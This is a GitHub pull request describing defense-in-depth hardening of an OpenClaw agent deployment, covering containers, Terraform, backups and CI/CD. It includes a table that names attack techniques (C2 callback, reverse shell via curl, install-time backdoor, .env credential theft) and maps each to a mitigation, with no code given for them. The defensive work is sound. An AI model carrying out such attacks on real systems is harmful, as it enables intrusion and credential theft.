Skip to content

Comprehensive Security Hardening — Defense-in-Depth Implementation#1

Merged
feliperun merged 1 commit into
mainfrom
security-hardening
Feb 10, 2026
Merged

Comprehensive Security Hardening — Defense-in-Depth Implementation#1
feliperun merged 1 commit into
mainfrom
security-hardening

Conversation

@feliperun
Copy link
Copy Markdown
Owner

@feliperun feliperun commented Feb 10, 2026

Summary

Implements comprehensive defense-in-depth security hardening across all layers of the infrastructure, informed by the Bitdefender Technical Advisory on OpenClaw Exploitation in Enterprise Networks (Feb 2026).

This PR positions create-openclaw-agent as a reference implementation for secure OpenClaw IaC deployment.

Changes by Category

Critical Fixes

  • Secrets on persistent disk — Fixed .env being written to persistent disk instead of tmpfs. Now writes entire .env to tmpfs and creates a symlink. Secrets are never captured in shell variables (writes directly from gcloud to tmpfs files).
  • Installer checksum hard-fail — Failed checksum now aborts installation instead of silently continuing. Added macOS shasum fallback.
  • Terraform injection — Added validation blocks on all string variables to prevent shell injection via templatefile().

Container Hardening (docker-compose)

  • Bridge network — Migrated from network_mode: host to isolated bridge network (openclaw-net). Gateway ports bound to 127.0.0.1 only. Qdrant and Chrome accessible only within the bridge.
  • Read-only filesystemread_only: true on all containers with explicit tmpfs mounts for writable paths (/tmp, /home/node/.cache, /dev/shm).
  • Capability droppingcap_drop: [ALL] on all containers. Chrome gets only SYS_ADMIN (required for headless operation).
  • Image pinning — All Docker images pinned by version + SHA256 digest (Qdrant v1.13.2, Chrome 145.0.7632.46).

Infrastructure Hardening (Terraform)

  • Egress firewall — Three new rules: allow HTTPS (443/80), allow DNS (53), deny-all (priority 65534). Blocks reverse shells on non-standard ports.
  • OS Loginenable-oslogin = TRUE ties SSH access to IAM identity.
  • Automatic security updatesunattended-upgrades installed on VM (no auto-reboot).
  • Data Access audit logging — Enabled on backup bucket via google_project_iam_audit_config.
  • Narrowed OAuth scopes — Replaced cloud-platform with specific API scopes.

Backup Security

  • Client-side encryption — Backups encrypted with age before upload to GCS. Private key stored in Secret Manager.
  • Backward compatibility — Restore handles both encrypted (.age) and unencrypted (.tar.gz) backups.
  • Cleanup traps — Sensitive temp files cleaned up on any exit via trap.

CI/CD Hardening

  • gitleaks — Replaced grep-based secret detection with gitleaks/gitleaks-action.
  • SHA-pinned Actions — All GitHub Actions pinned by commit SHA.
  • Permissions — Workflow restricted to permissions: contents: read.
  • Trivy — Container image vulnerability scanning for Qdrant and Chrome.

Supply Chain

  • Pre-commit hooks.pre-commit-config.yaml with gitleaks, shellcheck, terraform-fmt/validate.
  • Docker image digests — All images pinned by tag@sha256:digest.
  • .gitleaks.toml — Project-specific allowlist for documentation files.

Documentation

  • docs/security.md — Comprehensive security architecture document with threat model, 7 defense layers, attack vector mapping, and verification commands.
  • README.md — Updated with security section and architecture details.
  • AGENTS.md / CLAUDE.md — Updated project structure and conventions.

Attack Vector Mapping (Bitdefender Advisory)

Attack Vector Mitigation
ClawHavoc (base64 payload, C2 callback) Egress firewall blocks non-standard ports; cap_drop: ALL; bridge network
AuthTool (reverse shell via curl) Egress restricted to 80/443/53; read_only filesystem; no-new-privileges
Hidden Backdoor (install-time exploitation) Checksum hard-fail; SHA-pinned Actions; Secure Boot; input validation
Credential Exfiltration (.env theft) .env symlink to tmpfs; secrets never on persistent disk; restrictive umask

Code Review

Three sequential review rounds were performed:

  1. Security — Found and fixed 6 issues (1 CRITICAL shell injection, 3 HIGH)
  2. Correctness — Found and fixed 8 issues (1 CRITICAL OAuth scope, 6 HIGH including Chrome healthcheck)
  3. Best practices — Cleanup, DRY improvements, shellcheck compliance

E2E Testing

  • Full infrastructure provisioned on real GCP (project, VM, bucket, secrets, firewall rules)
  • 12/12 security assertions verified (no external IP, Secure Boot, IAP firewall, egress rules, OS Login, etc.)
  • All resources destroyed after testing

Usability Impact

Zero impact on agent functionality. All agent operations (crons, configs, plugins, memory, workspace) continue working because they use mounted volumes which are exempt from read_only. Bridge network changes are transparent via automatic service name configuration.

Test Plan

  • tofu validate passes
  • tofu fmt -check passes
  • E2E infrastructure provisioning and security verification
  • ShellCheck compliance on all shell scripts
  • YAML lint on templates
  • Three rounds of code review (security, correctness, best practices)

@feliperun
Comprehensive security hardening across all layers
825b2aa 
Implements defense-in-depth security measures informed by the Bitdefender
Technical Advisory on OpenClaw exploitation (Feb 2026). This positions the
project as a reference implementation for secure OpenClaw IaC.

Critical fixes:
- Fix secrets leaking to persistent disk (tmpfs symlink, no shell vars)
- Fix installer checksum verification hard-fail (with macOS support)
- Fix Terraform variable injection via validation blocks

Container hardening:
- Migrate from host network to isolated bridge network
- Read-only root filesystem with explicit tmpfs mounts
- Drop all Linux capabilities (cap_drop: ALL)
- Pin Docker images by version + SHA256 digest
- Chrome gets only SYS_ADMIN capability

Infrastructure hardening:
- Egress firewall restricts outbound to ports 80/443/53 only
- OS Login for IAM-authenticated SSH access
- Automatic security updates (unattended-upgrades)
- Data Access audit logging on backup bucket
- Narrowed OAuth scopes

Backup security:
- Client-side encryption with age before GCS upload
- Backward-compatible restore (handles both encrypted and unencrypted)
- Cleanup traps for sensitive temp files

CI/CD hardening:
- Replace grep with gitleaks for secret detection
- SHA-pin all GitHub Actions
- Restrict workflow permissions to contents:read
- Add Trivy container image vulnerability scanning

Supply chain:
- Pre-commit hooks (gitleaks + shellcheck + terraform-fmt)
- All Docker images pinned by digest

Documentation:
- New docs/security.md with full threat model and defense mapping
- Updated README, AGENTS.md with security architecture
@feliperun feliperun merged commit 591f96d into main Feb 10, 2026
@feliperun feliperun deleted the security-hardening branch February 10, 2026 23:15
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@feliperun